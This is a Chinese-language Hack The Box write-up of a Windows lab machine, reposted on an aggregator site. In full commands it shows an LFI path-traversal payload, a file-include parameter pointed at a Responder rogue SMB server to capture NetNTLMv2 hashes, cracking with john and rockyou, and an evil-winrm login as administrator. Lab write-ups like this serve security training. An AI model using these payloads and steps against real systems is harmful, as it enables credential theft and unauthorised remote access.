IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> hack the box(5985 WinRM) -> 正文阅读

[PHP知识库]hack the box(5985 WinRM)

nmap参数定义

-v:增加详细级别(基本上输出更多信息)-p-:此标志扫描0-65535范围内的所有TCP端口-sV:尝试确定端口上运行的服务版本-sC:使用默认NSE脚本扫描--min-rate:这用于指定Nmap每秒应发送的最小数据包数;数字越高,扫描速度越快

nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91

?根据Nmap扫描的结果,机器使用Windows作为操作系统,在端口80上运行Apache Web服务器,在端口5985上运行WinRM。7680端口上运行的服务标识为pando pub,这是一种文件传输服务。


?

当访问http://{target_IP}/时,网站重定向为unika.htb。

基于名称的虚拟托管是一种在单个服务器上托管多个域名(每个域名分别处理)的方法。这允许一台服务器共享其资源,例如内存和处理器周期,而不需要相同主机名使用所有服务。web服务器检查HTTP请求的主机头字段中提供的域名,并根据该域名发送响应。/etc/hosts文件用于将主机名解析为IP地址,因此我们需要在该域的/etc/hosts文件中添加一个条目,以使浏览器能够解析unika的地址。

echo "10.129.136.91 unika.htb" | sudo tee -a /etc/hosts

文件包含漏洞

动态网站包括动态的HTML页面,使用来自HTTP请求的信息包括GET和POST参数、cookie和其他变量。一个页面通常会根据其中一些参数“include”另一个页面。

LFI或本地文件包含是指攻击者能够让网站包含一个本不打算作为此应用程序选项的文件。一个常见的例子是,应用程序使用文件的路径作为输入。如果应用程序将此输入视为受信任的,并且未对此输入执行所需的检查,则攻击者可以使用 ../ 输入文件名并最终在本地文件系统中查看敏感文件。在某些有限的情况下,LFI也会导致代码执行。

RFI或远程文件包含类似于LFI,但在这种情况下,攻击者可以使用HTTP、FTP等协议在主机上加载远程文件。

http://unika.htb/index.php?
page=../../../../../../../../windows/system32/drivers/etc/hosts

Responder

工作流程

Responder程序可以执行多种不同类型的攻击,但在这种情况下,它将设置恶意SMB服务器。
当目标计算机尝试对该服务器执行NTLM身份验证时,Responder会向服务器发送一个challenge,要求服务器使用用户的密码进行加密。当服务器响应时,Responder将使用质询和加密响应生成NetNTLMv2。虽然我们无法逆转NetNTLMv2,但我们可以尝试使用许多不同的常用密码,看看是否有任何密码会生成相同的challenge响应,如果找到一个,我们就知道这就是密码。这通常被称为散列破解,我们将使用一个名为John The Ripper的程序来实现。

使用Responder之前需要查看Responder.conf配置文件,SMB的服务是否开启。

?配置文件就绪后,我们可以继续使用python3启动响应程序,通过-I标志传入接口以监听:

python Responder.py -I tun0

?在响应服务器就绪的情况下,我们通过web浏览器按如下方式设置页面参数,告诉服务器包含来自SMB服务器的资源。

http://unika.htb/?page=/10.10.14.7/somefile  #服务器端访问

监听得到

?将得到的hash值保存为hash.txt文件。

散列破解

将上述的hash值保存为hash.txt

我们将散列文件传递给john,并破解管理员帐户的密码。散列类型由john命令行工具自动识别:

-w : wordlist to use for cracking the hash

john -w=/usr/share/wordlists/rockyou.txt hash.txt

?得出关键信息:password:badminton

WinRM

Windows Remote Management或WinRM是Windows本机内置的远程管理协议,基本上使用简单的对象访问协议与远程计算机和服务器以及操作系统和应用程序进行交互。WinRM允许用户:

→ 与主机进行远程通信和接口

→ 在非本地但可通过网络访问的系统上远程执行命令。
→ 从远程位置监视、管理和配置服务器、操作系统和客户机。
作为pentester,这意味着如果我们能找到具有远程管理权限的用户的凭据(通常是用户名和密码),我们就有可能在主机上获得PowerShell外壳。

利用evil-winrm远程连接:

evil-winrm -i 10.129.136.91 -u administrator -p badminton

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-04-22 18:16:01  更:2022-04-22 18:16:15 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 3:55:16-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计